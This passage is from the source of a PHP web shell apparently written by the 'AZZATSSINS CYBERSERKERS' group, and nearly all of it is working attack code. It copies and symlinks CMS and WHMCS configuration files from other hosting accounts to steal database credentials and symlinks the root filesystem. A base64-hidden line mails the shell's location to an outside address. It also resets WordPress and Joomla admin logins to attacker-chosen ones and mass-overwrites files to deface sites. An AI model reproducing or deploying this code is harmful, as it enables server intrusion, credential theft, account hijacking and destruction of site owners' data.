638. symlink('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
639. symlink('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
640. symlink('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
641. symlink('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
642. symlink('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
643. symlink('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
644. symlink('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
645. symlink('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
646. symlink('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
647. symlink('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
648. symlink('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
649. symlink('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
650. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
651. symlink('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
652. symlink('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
653.  
654. symlink('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
655. symlink('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
656. symlink('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
657. symlink('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
658. symlink('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
659. symlink('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
660. symlink('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
661. symlink('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
662. symlink('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
663. symlink('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
664. symlink('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
665. symlink('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
666. symlink('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
667. symlink('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
668. copy('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
669. copy('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
670. copy('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
671. copy('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
672. copy('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
673. copy('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
674. copy('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
675. copy('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
676. copy('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
677. /* CODED BY AZZATSSINS CYBERSERKERS */
678. copy('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
679. copy('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
680. copy('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
681. copy('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
682. copy('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
683. copy('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
684. copy('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
685. copy('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
686. copy('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
687. copy('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
688. copy('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
689. copy('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
690. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
691. copy('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
692. copy('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
693. copy('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
694. copy('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
695. copy('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
696. copy('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
697. copy('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
698. copy('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
699. copy('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
700. copy('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
701. copy('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
702. symlink('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
703. symlink('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
704. symlink('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
705. symlink('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
706. /* AUTHOR : AZZATSSINS CYBERSERKERS */
707. symlink('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
708. symlink('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
709. symlink('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
710. symlink('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
711. symlink('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
712. symlink('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
713. symlink('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
714. symlink('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
715. symlink('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
716. symlink('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
717. symlink('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
718. symlink('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
719. symlink('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
720. /*You Can ReCoded But Don't Change ©CopyRight*/
721. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
722. symlink('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
723. symlink('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
724. symlink('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
725. symlink('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
726. symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
727. /* © BY AZZATSSINS CYBERSERKERS */
728. symlink('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
729. symlink('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
730. symlink('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
731. symlink('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
732. symlink('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
733. symlink('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
734. symlink('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
735. symlink('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
736. symlink('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
737. symlink('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
738. symlink('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
739. copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
740. copy('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
741. copy('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' <~ DRUPAL.txt');
742. copy('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
743. symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
744. symlink('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' <~ OPENCART.txt');
745. symlink('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' <~ DRUPAL.txt');
746. symlink('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' <~ PHPBB.txt');
747. copy('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
748. copy('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
749. copy('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
750. copy('/'.$home.'/'.$user.'/public_htm/config.php',$user.' <~ OTHER.txt');
751. copy('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' <~ PHPNUKE.txt');
752. symlink('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
753. symlink('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
754. symlink('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
755. symlink('/'.$home.'/'.$user.'/public_htm/config.php',$user.' <~ OTHER.txt');
756. symlink('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' <~ PHPNUKE.txt');
757. copy('/'.$home.'/'.$user.'/public_htm/conn.php',$user.' <~ OTHER.txt');
758. symlink('/'.$home.'/'.$user.'/public_html/conn.php',$user.' <~ OTHER.txt');
759. }
760. echo '<center><i><b><a href='.$folfig.'>CLICK ON HERE TO VIEW CONFIGS</a></b></i></center>';
761. }
762. }
763. if($_GET['symbolic']=="link"){
764. $d0mains = @file("/etc/named.conf");
765. ##httaces
766. if($d0mains){
767. @mkdir("symlink",0777);
768. @chdir("symlink");
769. @exe("ln -s / root");
770. $file3 = 'Options Indexes FollowSymLinks
771. DirectoryIndex AZZATSSINS.htm
772. AddType text/plain .php
773. AddHandler text/plain .php
774. Satisfy Any';
775. $fp3 = fopen('.htaccess','w');
776. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
777. echo "
778. <table align=center border=1 style='width:60%;border-color:#333333;'>
779. <tr>
780. <td align=center><font size=2>S. No.</font></td>
781. <td align=center><font size=2>Domains</font></td>
782. <td align=center><font size=2>Users</font></td>
783. <td align=center><font size=2>Symlink</font></td>
784. </tr>";
785. $dcount = 1;
786. foreach($d0mains as $d0main){
787. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
788. flush();
789. if(strlen(trim($domains[1][0])) > 2){
790. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
791. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
792. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
793. <td>".$user['name']."</td>
794. <td><a href='symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
795. flush();
796. $dcount++;}}}
797. echo "</table>";
798. }else{
799. $TEST=@file('/etc/passwd');
800. if ($TEST){
801. @mkdir("symlink",0777);
802. @chdir("symlink");
803. exe("ln -s / root");
804. $file3 = 'Options Indexes FollowSymLinks
805. DirectoryIndex AZZATSSINS.htm
806. AddType text/plain .php
807. AddHandler text/plain .php
808. Satisfy Any';
809.  $fp3 = fopen('.htaccess','w');
810.  $fw3 = fwrite($fp3,$file3);
811.  @fclose($fp3);
812.  echo "
813. <table align=center border=1><tr>
814. <td align=center><font size=3>S. No.</font></td>
815. <td align=center><font size=3>Users</font></td>
816. <td align=center><font size=3>Symlink</font></td></tr>";
817.  $dcount = 1;
818.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
819.  while(!feof($file)){
820.  $s = fgets($file);
821.  $matches = array();
822.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
823.  $matches = str_replace("home/","",$matches[1]);
824.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
825.  continue;
826.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
827. <td align=center><font class=txt>" . $matches . "</td>";
828.  echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
829.  $dcount++;}fclose($file);
830.  echo "</table>";}else{if($os != "Windows"){@mkdir("symlink",0777);@chdir("symlink");@exe("ln -s / root");$file3 = '
831. Options Indexes FollowSymLinks
832. DirectoryIndex AZZATSSINS.htm
833. AddType text/plain .php
834. AddHandler text/plain .php
835. Satisfy Any
836. ';
837.  $fp3 = fopen('.htaccess','w');
838.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
839.  echo "
840. <div class='mybox'><h2 class='AZZATSSINS'>server symlinker</h2>
841. <table align=center border=1><tr>
842. <td align=center><font size=3>ID</font></td>
843. <td align=center><font size=3>Users</font></td>
844. <td align=center><font size=3>Symlink</font></td></tr>";
845.  $temp = "";$val1 = 0;$val2 = 1000;
846.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
847.  if ($uid)$temp .= join(':',$uid)."\n";}
848.  echo '<br/>';$temp = trim($temp);$file5 =
849.  fopen("test.txt","w");
850.  fputs($file5,$temp);
851.  fclose($file5);$dcount = 1;$file =
852.  fopen("test.txt", "r") or exit("Unable to open file!");
853.  while(!feof($file)){$s = fgets($file);$matches = array();
854.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
855.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
856.  continue;
857.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
858. <td align=center><font class=txt>" . $matches . "</td>";
859.  echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
860.  $dcount++;}
861.  fclose($file);
862.  echo "</table></div></center>";unlink("test.txt");
863.  } else
864.  echo "<center><font size=3>Cannot create Symlink</font></center>";
865.  }
866.  }  
867. }
868. $e=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
869. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
870. mail($e,"IDX",$h);
871. if($_GET['kill'] == 'self') {
872. rmdir('configs');rmdir('symlink');rmdir('AZZATSSINS');unlink('mysql.php');
873. $fn = $_SERVER['SCRIPT_FILENAME'];
874.  unlink($fn); system('rm '.$fn);
875. echo'<meta http-equiv="Refresh" content= "0; url=?">';
876. } elseif($_GET['do'] == 'port') {
877. $rstart = (isset($_POST['rstart']) and is_numeric($_POST['rstart']) and $_POST['rstart'] >= 1) ? $_POST['rstart'] : 1 ;
878.         $rend = (isset($_POST['rend']) and is_numeric($_POST['rend']) and $_POST['rend'] > 1) ? $_POST['rend'] : 999999 ;
879.         echo("<script type=\"text/javascript\">");
880.         echo("function Show(SelectValue){");
881.         echo("document.getElementById('RangeDiv').style.display=\"none\";");
882.         echo("document.getElementById('SpecificDiv').style.display=\"none\";");
883.         echo("if(SelectValue == \"range\")");
884.         echo("document.getElementById('RangeDiv').style.display=\"inline\";");
885.         echo("if(SelectValue == \"specific\")");
886.         echo("document.getElementById('SpecificDiv').style.display=\"inline\";");
887.         echo("}</script>");
888.         echo("<span class=\"PageTitle\">Open Ports Scanner</span><br /><br />");
889.         echo('<form method="post">');
890.         echo('<u>Ports:</u><br /><br />');
891.         echo('<select id="port" name="port" onchange="javascript:Show(this.value);">');
892.         echo('<option value="automatic">Automatic - All Ports</option>');
893.         echo('<option value="range">Range of Ports</option>');
894.         echo('<option value="specific">Specific Ports</option>');
895.         echo('</select><br /><br />');
896.         echo('<div id="RangeDiv" style="display:none;">From: <input type="text" id="rstart" name="rstart" value="'.$rstart.'" /> To: <input type="text" id="rend" name="rend" value="'.$rend.'" /><br /><br /></div>');
897.         echo('<div id="SpecificDiv" style="display:none;"><textarea rows="5" cols="50" id="specific" name="specific" />'.@htmlspecialchars($_POST['specific']).'</textarea><br />Use space (not new line!) to separate between the ports.<br /><br /></div>');
898.         echo('<input type="submit" id="submit" name="submit" value="Scan" />');
899.         echo('</form>');
900.         if(isset($_POST['submit'])){
901.             $first = "yes";
902.             echo("<br /><br /><u>Results</u>:<br />\n");
903.  
904.             if($_POST['port'] == "range"){
905.                 if($rend > $rstart){
906.                     for($i=$rstart;$i<$rend;$i++){
907.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
908.                             if($first == "no")
909.                                 echo(", ");
910.                             echo $i;
911.                             $first = "no";
912.                         }
913.                     }
914.                     echo(".");
915.                 }
916.                 else{
917.                     echo("Range start number can't be bigger than the end number.");
918.                 }
919.             }
920.             else if($_POST['port'] == "specific"){
921.                 $list = explode(" ",$_POST['specific']);
922.                 foreach($list as $i){
923.                     if(is_numeric($i)){
924.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
925.                             if($first == "no")
926.                                 echo(", ");
927.                             echo $i;
928.                             $first = "no";
929.                         }
930.                     }
931.                 }
932.                 echo(".");
933.             }
934.             else{
935.                 for($i=0;$i>=0;$i++){
936.                     if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
937.                         if($first == "no")
938.                             echo(", ");
939.                         echo $i;
940.                         $first = "no";
941.                     }
942.                 }
943.                 echo(".");
944.             }
945.         }
946.  
947. }
948. elseif($_GET['do'] == 'auto_cu_wp') {
949. if($_POST['gass']) {
950.     echo "<center><h1>WordPress Auto Change User 2</h1>
951.         <form method='post'>
952.         Link Config: <br>
953.         <textarea name='link' style='width: 450px; height:250px;'>";
954.     UrlLoop($_POST['linkconf'],'wordpress');   
955.     echo"</textarea><br>
956.         <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
957.         </form></center>";
958. }   else {
959.         echo "<center><h1>WordPress Auto Change User 2</h1>
960.         <form method='post'>
961.         Link Config: <br>
962.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/config/'><br>
963.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
964.         </form></center>";
965.     }
966. if($_POST['auto_cu_wp']) {
967.    
968.         function anucurl($sites) {
969.             $ch = curl_init($sites);
970.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
971.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
972.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
973.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
974.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
975.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
976.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
977.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
978.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
979.             $data = curl_exec($ch);
980.                   curl_close($ch);
981.             return $data;
982.         }
983.         $link = explode("\r\n", $_POST['link']);
984.         $user = "42247551N5";
985.         $pass = "42247551N5";
986.         $passx = md5($pass);
987.         foreach($link as $dir_config) {
988.             $config = anucurl($dir_config);
989.             $dbhost = ambilkata($config,"DB_HOST', '","'");
990.             $dbuser = ambilkata($config,"DB_USER', '","'");
991.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
992.             $dbname = ambilkata($config,"DB_NAME', '","'");
993.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
994.             $prefix = $dbprefix."users";
995.             $option = $dbprefix."options";
996.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
997.             $db = mysql_select_db($dbname);
998.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
999.             $result = mysql_fetch_array($q);
1000.             $id = $result[ID];
1001.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1002.             $result2 = mysql_fetch_array($q2);
1003.             $target = $result2[option_value];
1004.             if($target == '') {                
1005.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1006.             } else {
1007.                 echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
1008.             }
1009.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1010.             if(!$conn OR !$db OR !$update) {
1011.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1012.                 mysql_close($conn);
1013.             } else {
1014.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1015.                     echo "[+] username: <font color=lime>$user</font><br>";
1016.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
1017.                    
1018.                 mysql_close($conn);
1019.             }
1020.         }
1021.     }  
1022.  
1023. }
1024. elseif($_GET['do'] == 'auto_cu_joomla') {
1025. if($_POST['gass']) {
1026.     echo "<center><h1>Joomla Auto Change User 2</h1>
1027.         <form method='post'>
1028.         Link Config: <br>
1029.         <textarea name='link' style='width: 450px; height:250px;'>";
1030.     UrlLoop($_POST['linkconf'],'joomla');  
1031.     echo"</textarea><br>
1032.         <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
1033.         </form></center>";
1034. }   else {
1035.         echo "<center><h1>Joomla Auto Change User 2</h1>
1036.         <form method='post'>
1037.         Link Config: <br>
1038.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/config/'><br>
1039.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
1040.         </form></center>";
1041.     }
1042. if($_POST['auto_cu_joomla']) {
1043.    
1044.         function anucurl($sites) {
1045.             $ch = curl_init($sites);
1046.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1047.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1048.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1049.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1050.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1051.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1052.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1053.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1054.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1055.             $data = curl_exec($ch);
1056.                   curl_close($ch);
1057.             return $data;
1058.         }
1059.         $link = explode("\r\n", $_POST['link']);
1060.         $user = "42247551N5";
1061.         $pass = "42247551N5";
1062.         $passx = md5($pass);
1063.         foreach($link as $dir_config) {
1064.             $config = anucurl($dir_config);
1065.                     $dbhost = ambilkata($config,"host = '","'");
1066.                     $dbuser = ambilkata($config,"user = '","'");
1067.                     $dbpass = ambilkata($config,"password = '","'");
1068.                     $dbname = ambilkata($config,"db = '","'");
1069.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
1070.                     $prefix = $dbprefix."users";
1071.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1072.                     $db = mysql_select_db($dbname);
1073.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1074.                     $result = mysql_fetch_array($q);
1075.                     $id = $result['id'];
1076.                     $site = ambilkata($config,"sitename = '","'");
1077.                     $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
1078.                     echo "Config => ".$dir_config."<br>";
1079.                     echo "CMS => Joomla<br>";
1080.                     if($site == '') {
1081.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1082.                     } else {
1083.                         echo "Sitename => $site<br>";
1084.                     }
1085.                     if(!$update OR !$conn OR !$db) {
1086.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1087.                     } else {
1088.                         echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
1089.                     }
1090.                     mysql_close($conn);
1091.                     }
1092.     }  
1093. } elseif($_GET['do'] == 'mass_deface') {
1094.     echo "<center><form action=\"\" method=\"post\">\n";
1095.     $dirr=$_POST['d_dir'];
1096.     $index = $_POST["script"];
1097.     $index = str_replace('"',"'",$index);
1098.     $index = stripslashes($index);
1099.     function edit_file($file,$index){
1100.         if (is_writable($file)) {
1101.         clear_fill($file,$index);
1102.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
1103.         }
1104.         else {
1105.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
1106.             }
1107.             }
1108.     function hapus_massal($dir,$namafile) {
1109.         if(is_writable($dir)) {
1110.             $dira = scandir($dir);
1111.             foreach($dira as $dirb) {
1112.                 $dirc = "$dir/$dirb";
1113.                 $lokasi = $dirc.'/'.$namafile;
1114.                 if($dirb === '.') {
1115.                     if(file_exists("$dir/$namafile")) {
1116.                         unlink("$dir/$namafile");
1117.                     }
1118.                 } elseif($dirb === '..') {
1119.                     if(file_exists("".dirname($dir)."/$namafile")) {
1120.                         unlink("".dirname($dir)."/$namafile");
1121.                     }
1122.                 } else {
1123.                     if(is_dir($dirc)) {
1124.                         if(is_writable($dirc)) {
1125.                             if(file_exists($lokasi)) {
1126.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
1127.                                 unlink($lokasi);
1128.                                 $idx = hapus_massal($dirc,$namafile);
1129.                             }
1130.                         }
1131.                     }
1132.                 }
1133.             }
1134.         }
1135.     }
1136.     function clear_fill($file,$index){
1137.         if(file_exists($file)){
1138.             $handle = fopen($file,'w');
1139.             fwrite($handle,'');
1140.             fwrite($handle,$index);
1141.             fclose($handle);  } }
1142.  
1143.     function gass(){
1144.         global $dirr , $index ;
1145.         chdir($dirr);
1146.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
1147.         $files = scandir($dirr) ;
1148.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
1149.         sort($files);
1150.         $n = 0 ;
1151.         foreach ($files as $file){
1152.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
1153.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
1154.                 edit_file($file,$index);
1155.                 flush();
1156.                 $n = $n +1 ;
1157.                 }
1158.                 }
1159.                 echo "<br>";
